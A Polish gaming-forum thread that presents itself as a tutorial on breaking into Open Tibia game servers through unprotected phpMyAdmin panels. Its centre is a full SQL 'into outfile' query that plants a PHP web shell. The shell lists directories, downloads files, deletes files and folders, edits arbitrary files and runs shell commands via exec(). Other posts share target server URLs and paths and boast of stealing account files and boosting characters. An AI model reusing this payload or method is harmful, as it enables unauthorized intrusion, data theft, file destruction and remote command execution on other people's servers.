[TuT] phpmyadmin

[bounty]

ujme to tak

po dłuższym czasie znalazłem server na który udało mi się wejść i znaleźć wszystkie pliki otsa

moze i to działa

ale wejsc na plik swojej postaci poprostu sie nie da ;-)

mam link:

 

http://ELOELOELOELOEOTS.COM/edytuj.php?q=C...TS/data/players

 

widze tam swoją postać

POSTAC.XML

i gdy biore edytuj przenosi mnie do głównego okna tego które otwiera sie jak sie wpisze samo ELOELOELOTS/edytuj.php

;-(

ten skrypt był troche niedojeb*** jest już nowy troche leprzy ale i tak . . .

jutro wrzyce swój troche podtuningowany i z malym info

 

EDIT:

Ok juz mam dla was ratunek xDDD http://www.megaupload.com/?d=WS8PWWZU prosze oto moj skarb po tuningu xDD

info jest na stronce tzn bounty.php

@up tym pierwszym skryptem da sie wejść tylko mozna sie spocic xDD

a ten nam sie predzej spoci niz wy :D :D

[Brain]

wszystko ladnie pieknie tylko zatrzymalem sie na 7pkt ;d gdy wklejam to co powinienem to wyskakuje taki komunikat

 

MySQL zwrócił komunikat: Dokumentacja

#1064 - Something is wrong in your syntax obok '' w linii 1

[Stefek]

@2xUP

Możesz dac do tego skana ?? (Niby ma 6kb ale zawsze jest jakieś ryzyko)

[Brain]

stefek ja skanowalem nic niema ;d tam sa 3 pliki txt ;d ale zeby nie bylo ze posty nabijam ;d

 

Plik phpmyadmin_.rar otrzymany 2009.02.20 13:49:52 (CET)

Obecny status:zakończono

Wynik: 0/39 (0%)

 

 

Antywirus Wersja Ostatnia aktualizacja Wynik

a-squared 4.0.0.93 2009.02.20 -

AhnLab-V3 2009.2.20.1 2009.02.20 -

AntiVir 7.9.0.85 2009.02.20 -

Authentium 5.1.0.4 2009.02.20 -

Avast 4.8.1335.0 2009.02.19 -

AVG 8.0.0.237 2009.02.20 -

BitDefender 7.2 2009.02.20 -

CAT-QuickHeal 10.00 2009.02.20 -

ClamAV 0.94.1 2009.02.20 -

Comodo 984 2009.02.19 -

DrWeb 4.44.0.09170 2009.02.20 -

eSafe 7.0.17.0 2009.02.19 -

eTrust-Vet 31.6.6367 2009.02.20 -

F-Prot 4.4.4.56 2009.02.19 -

F-Secure 8.0.14470.0 2009.02.20 -

Fortinet 3.117.0.0 2009.02.20 -

GData 19 2009.02.20 -

Ikarus T3.1.1.45.0 2009.02.20 -

K7AntiVirus 7.10.637 2009.02.19 -

Kaspersky 7.0.0.125 2009.02.20 -

McAfee 5530 2009.02.19 -

McAfee+Artemis 5530 2009.02.19 -

Microsoft 1.4306 2009.02.20 -

NOD32 3873 2009.02.20 -

Norman 6.00.06 2009.02.20 -

nProtect 2009.1.8.0 2009.02.20 -

Panda 10.0.0.10 2009.02.20 -

PCTools 4.4.2.0 2009.02.20 -

Prevx1 V2 2009.02.20 -

Rising 21.17.42.00 2009.02.20 -

SecureWeb-Gateway 6.7.6 2009.02.20 -

Sophos 4.38.0 2009.02.20 -

Sunbelt 3.2.1855.2 2009.02.17 -

Symantec 10 2009.02.20 -

TheHacker 6.3.2.3.261 2009.02.20 -

TrendMicro 8.700.0.1004 2009.02.20 -

VBA32 3.12.10.0 2009.02.20 -

ViRobot 2009.2.20.1617 2009.02.20 -

VirusBuster 4.5.11.0 2009.02.19 -

 

[tymek]

 

"Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in D:\Gry\WebServ\httpd\bounty.php on line 1"

 

 

I tak wyskakuje na każdym servie lecz tylko ścieżki się zmieniają ;/

[Bandita]

cóż po dłuższej zabawie stwierdzam że to ogólnie ma małe szanse powodzenia

problem tkwi w tym że skrypty które dał bounty nie działają lub poprostu są bezużyteczne bo jedyne co można zrobić to połazić komuś po dysku, nie można edytować pliku swojej postaci czy czegoś w tym rodzaju

ogólnie znalazłem pare serverów bez hasla a na jednym zabawiłem jeden dzień, ale żeby to sie udalo musi to być server 8.4 bądź niewiele starszy protokół, chodzi o to że w 8.4 postacie i konta przechowywane są właśnie w bazach danych do których staramy się zdobyć dostęp

jeśli nie jest to server stawiany pod sql to możemy sobie sie poślinić patrząc na 17878127817812 accountów w folderze accounts bo i tak nie idzie tego chociażby otworzyć żeby sprawdzic jakie są do nich hasła

 

ogólnie mały sens jest tego ze względu na to że bardzo trudno znaleźć server 8.4, niezabezpieczony i z w pełni skonfigurowaną i dobrze działającą bazą danych

 

tyle. ;-)

[albert02]

A co jesli nie mozna wbic poprzez /phpmyadmin/? Jest jakas inna komenda? Glownie nie dziala to przy acc by gesior. To jest bodajze pod mysql

[Bandita]

jeśli nie idzie wbić przez phpmyadmin to chodzi o to że nic nie można zrobić i w tym tkwi problem, z tego właśnie względu jest to ogólnie bezuzyteczne

 

ewt. kiedys robili takie acc makery które dziś tez sa spotykane to ewt. możesz sobie ustawić jakie ma robić postacie(później zmienic oczywiscie ), tzn na starcie 5001001218291189expa, 10128912891 lvl ale to też nie wszedzie ;-)

[bounty]

Sorki ale niewiem co jest z nim nie tak ... :/ u mnie smigalo all dobrze ale dam wam zwylky i pare ots z wrzuconym skryptem i sciezki aby wynagrodzic wam stracony czas XDD

 

strona:

http://skulskiots.dyndns.org/bounty.php?file=./bounty.php

sciezka:

E:/OTS by Szymon(przerobionamapka);p/ots/data

 

strona

http://ots76.no-ip.pl/bounty.php

a ots nie chce mi sie szukac

 

ok niechce mi sie szukac :P jakby ktos chcial ten skypt to niech napisze to wzuce bo to juz nudne ....

PS ten jest bez info

 

[Bandita]

no dzialający skrypt móglbys wrzucic ;-)

[czesioi]

Siemka dla niewiedzących:

 

Zapisz plik na dysk pliku:

[iP OTSa]/bounty.php?file=E:/OTS by Szymon(przerobionamapka);p/ots/data/accounts/....xml

 

ale jak edytowac plik i go zapisac na dysku hostera ??

aa.. i Bounty mozesz tu podac juz gotowy skrypt taki jak bounty.php tylko ze bez wyjasnien bo z wyjasniejami chyba cos nie dziala i dlatego ludziem nie dziala! xDD

[logmen21]

Co do edytowania xml to mysisz edit w notatniku i zapisac jako wszytkio!

[Gość black_shadow]

Sorka za odkopywanie ale czy ma ktoś może ten działający Bounty.PHP skrypcik ? Jeżeli tak to proszę o wrzucenie go

[endu]

select'<?php if ( isset($_GET["file"]) ) { header("Cache-control: private"); header("Content-Length: " . filesize($_GET["file"])); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename=" . basename($_GET["file"])); readfile($_GET["file"]);} ?> <body link="#DAA520" alink="#DAA520" vlink="#DAA520" text="#FFF8DC" bgcolor="black"> <table width="100%" cellspacing="0" cellpadding="10" HEIGHT="300"> <tr> <td colspan="2" valign="middle"><img src="http://www.mpcforum.pl/style_images/4_4_ef04ed8d_logo4.gif"><div align="right"><font size=2><a style="text-decoration: none;" href=bounty.php?page=1>Zawartosc katalogu</a> <a style="text-decoration: none;" href=bounty.php?page=2>Usuwanie</a> <a style="text-decoration: none;" href=bounty.php?page=3>Edycja plikow</a> <a style="text-decoration: none;" href=bounty.php?page=4>Polecenia</a> <a style=text-decoration:none; href=bounty.php?page=5>Info</a> <a style=text-decoration:none; href=http://www.mpcforum.pl/>MPCFORUM</a></font></div></td> </tr> <tr> <td valign="top"> <?php $page = $_GET["page"]; if ($page=="") { echo "<h1>Witaj moj drogi haxiorku </h1>"; } elseif($page==1){ echo "<form method=post> <input type=text name=a style=background-color:black;color:#FFF8DC> <input type=submit value=OK style=background-color:black;color:#FFF8DC> </form>"; $a=$_POST["a"]; echo ("<h2>Wszyskie pliki i foldery w: $a</h2><br>"); if ($dir = @opendir("$a")) { while($file = readdir($dir)) { echo "$file"; echo "<br>"; } closedir($dir); } } elseif($page==2){ echo "<h2>Usuwanie pojedynczego pliku</h2><form method=post> <input type=text name=del style=background-color:black;color:#FFF8DC> <input type=submit value=del style=background-color:black;color:#FFF8DC> </form> <br>"; $del=$_POST["del"]; if ($del=="") { } else { unlink("$del"); echo("Plik $del zostal usuniety pomyslnie"); } echo "<br><h2>Usuwanie Katalogu</h2> <br> <form method=post> <input type=text name=deldir style=background-color:black;color:#FFF8DC> <input type=submit value=del style=background-color:black;color:#FFF8DC> </form>"; function DeleteDir($dir) { $fd = opendir($dir); if(!$fd) return false; while (($file = readdir($fd))!== false) { if($file =="." || $file== "..") continue; if(is_dir($dir."/".$file)) { DeleteDir($dir."/".$file); } else { unlink("$dir/$file"); } } closedir($fd); rmdir($dir); } $deldir=$_POST["deldir"]; if ($deldir==""){ } else { DeleteDir($deldir); } } elseif($page==3){ echo "<h2>Edycja plikow</h2><br><form method=post> <input type=text name=fff style=background-color:black;color:#FFF8DC> <input type=submit value=OK style=background-color:black;color:#FFF8DC> </form>"; $fff = $_POST["fff"];$ooo = $fff; if ($fff==""){ $katalog = opendir("./"); } else { $katalog = opendir("$fff"); } while ($plik = strtolower(readdir($katalog))) { if ($plik<>"." && $plik<>".." && $plik<>"edytuj.php" ) $lista[]=$plik; } closedir($katalog); if (count($lista)>0) { echo "Wybierz plik do edycj:"; sort($lista); } for ($i=0;$i<count($lista);$i++) { echo "<br />Edytuj plik <b>$lista[$i]</b> <a style=text-decoration:none; href=bounty.php?page=3&edycja=$ooo$lista[$i]>Edytuj plik</a>"; } $edycja = $_GET["edycja"]; if (isset($_POST["tekst"]) && file_exists($edycja)) { $f = fopen($edycja, "w"); fputs($f, stripslashes($_POST["tekst"])); fclose($f); } if ($edycja<>"" && file_exists($edycja)) { echo "<p> </p>Edycja plik: <b>$edycja</b>"; echo "<form method=post><input type=hidden name=edycja value=$edycja style=background-color:black;color:#FFF8DC /><textarea name=tekst rows=20 cols=50 style=background-color:black;color:#FFF8DC>"; $f = fopen($edycja,"r"); while(!feof($f)) echo fread($f,1024); fclose($f); echo "</textarea><input type=submit value=Zapisz style=background-color:black;color:#FFF8DC /></form>"; } } elseif($page==4){ echo "<h2> Polecenia: </h2> <br> <form method=post> <input type=text name=opn style=background-color:black;color:#FFF8DC> <input type=submit value=OK style=background-color:black;color:#FFF8DC> </form>"; $opn=$_POST["opn"]; if($opn=="") { } else { exec("$opn"); echo ("<br>Ponecenie zostalo wykonane pomyslnie"); } } elseif ($page==5) { echo"<h4>Zawartosc katalogu</h4><br>Jak sama nazwa wskazuje opcja ta pozwala nam nijako przetrzepac dysk wlasciciela ots nie wiem po co ja tu umiescilem bo jest ona takze dostepna w Edyji plikow<br><h4>Usuwanie</h4><br> Chyba nie trudno sie domyslic . . .Tam gdzie jest usuwanie plikow wpisujemy sciezke docelowa do pliku ktory chcemy usunac a tam gdzie usuwanie folderu sciezke do folderu z \"/\" na koncu np. C:/Program files/ jednak ten folder jest za wielki do usuniecia :P<br><h4>Edycja plikow</h4><br>Mozemy oczywiscie sie przemieszczac po folderach oraz edytowac pliki jednak jest pewien problem kiedy mamy folder ze spacja to jak sprobujemy edytowac z niego plik to ... dupa musimy recznie przepisac sciezke do pliku (razem z nim :P) czyli jak w bedzie edycja=D:/super zamiast D:/super ots/data/playes/bounty.xml to recznie to wpisz to samo tyczy sie pliku ze spacja w nazwie<br><h4>Polecenia</h4><br>Dziala chyba tylko shutdown -s -t czas -c \"wiadomosc\" to polecenie oczywiscie wylacza kompa "; } ?> </td> </tr> </table><h6><div align="right">Dla mpcforum.pl od bounty</div><h6></body>' into outfile './../../httpd/bounty.php'

 

 

 

 

wytłumaczy mi to ktoś ??

[Nie_Mam_Nicku]

To zapytanie składa sie z 2 części. Cześci Sql-a i Php.

 

 

Wiec tak do bazy jest wysylanie polecenie select któro ma za zadanie zapisac jakąs zawartość która jest podana po ' i kączy sie do nastepnego '

 

a zapytanie odpowiadające za miejsce zapisu i nazwe pliku to into outfile './../../httpd/bounty.php' w tlumaczeniu do ../../../httpd/bounty.php

 

A co do zawartości (Czyli kodu php) jest on odpowiedzialny za wczytywanie plikow i edytowanie ich. Ścieszke do plików podajemy metoda GET

 

W tym zapytaniu nie wice nic trudnego wiec nie wiem wogule po co ja to tlumacze ale masz

 

Pozdrawiam NMN

[czesioi]

jak juz temat odkopany to mam pytanie..:

czemu jak uzywam "bounty.php" wyskakuje mi błąd: Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in E:\Program Files\WebServ\httpd\bounty.php on line 1

a jak używam "edytuj.php" to wszystko jest dobrze ??

[chaterchater]

Siemano .

 

 

 

 

Mam pytanko, czy są tu jakieś tzw. komendy?

 

No wiecie, żeby usunąć plik, ściągnąć czy coś w tym stylu z kolesia dysku?

 

Bo wbiłem mu na dysk, przeglądam sobie pliki itp, ale nie da się nic zrobić :X...

 

 

[Kulfix]

Siemano .

 

 

 

 

Mam pytanko, czy są tu jakieś tzw. komendy?

 

No wiecie, żeby usunąć plik, ściągnąć czy coś w tym stylu z kolesia dysku?

 

Bo wbiłem mu na dysk, przeglądam sobie pliki itp, ale nie da się nic zrobić :X...

Szkoda ze php sie nie zna co? ;P

Niestety mam ten sam problem. Mam juz skrypcik do podsylania mu plikow... potrzebuje jeszcze takiego ktory by usunal wybrany plik albo edytowal plik na innej partycji bo ten skrypcik tutaj ma z tym problem.

Tak czy inaczej smieszna jest reakcja ludzi jak widza 5000 lvl biegajacy i zabijajacy wszystko co sie rusza ;d

[czesioi]

Siemano .

Mam pytanko, czy są tu jakieś tzw. komendy?

No wiecie, żeby usunąć plik, ściągnąć czy coś w tym stylu z kolesia dysku?

Bo wbiłem mu na dysk, przeglądam sobie pliki itp, ale nie da się nic zrobić :X...

 

jezeli uzywasz tego skryptu to..

del <--- usuwasz plik

edycja <--- edytujesz pliki np. *.txt

q <--- chodzisz miedzy folderami i przegladasz pliki

[Gość black_shadow]

Niech ktoś upnie ten skrypt Bounty. Bo ten stary Edytuj.php ma kilka błędów.

 

Albo jak ktoś wie jak naprawić błąd taki jak :

- Jak folder ma w nazwie spacje to nie idzie go edytować / pobrać.

 

- Bounty.PHP nie działa. Jest błąd w 1 linijcie i tak pisze...

 

Niech ktoś przerobiony skrypt jeżeli posiada.

[Gość black_shadow]

@Refresh !!

 

Może ktoś odpowie??

[jackraymund]

Ja nigdy tego nie robiłem ale może serwer jest zabezpieczony i nie działa, podaj stronkę serwa też spróbuje

[Gość black_shadow]

@Up. Edytuj.php działa ale nie działa skrypt Bounty.php. Kapujesz? Coś jest ze skryptem w 1 linijce jest błąd. Ale nie znam się tak na PHP więc nie zrobie.

[melto1]

Probowalem juz na ~20 otsach pod tibie 8.54 ---- no i gowno, nie dziala. "Konfiguracja zabrania logowania bez hasła (zobacz AllowNoPassword)" wiec wy chyba nie wiem nza jaka tibie szukacie, ze wam wychodzi. Niektorzy przechytrzaja system, fajnymi opisami :P No ALE probuje dalej, moze cos wyjdzie... Ewentualnie wyskakuje blad, ze nie da sie polaczyc na serwer Mysql :/ ... Powodzenia reszcie, dzialam na systemie Win7 ale nie wiem czy to robi jakas roznice. Btw. w kazdym co probuje, zazwyczaj jest password, wiec ten system juz jest chyba zbyt znany i nie ma takich glupich, co by dali sie nabrac :P Cya

[kusiu67]

2. Np. mamy superots.org (przykładowy link ) dopisujemy /phpmyadmin/ wychodzi coś w tym stylu www.superots.org/phpmyadmin/

 

 

omg o_0. jak ja znajde jakis ots i na niego wchodze to mam np,.http://poland.otservlist.org/ots/1009606

 

i po tych numerach dopisac to phpadmin ?

 

@edit.

 

kolejne pytanie, niektorw servery niemaja strony, tylko ip. To do tego ip dopisac phpadmin ?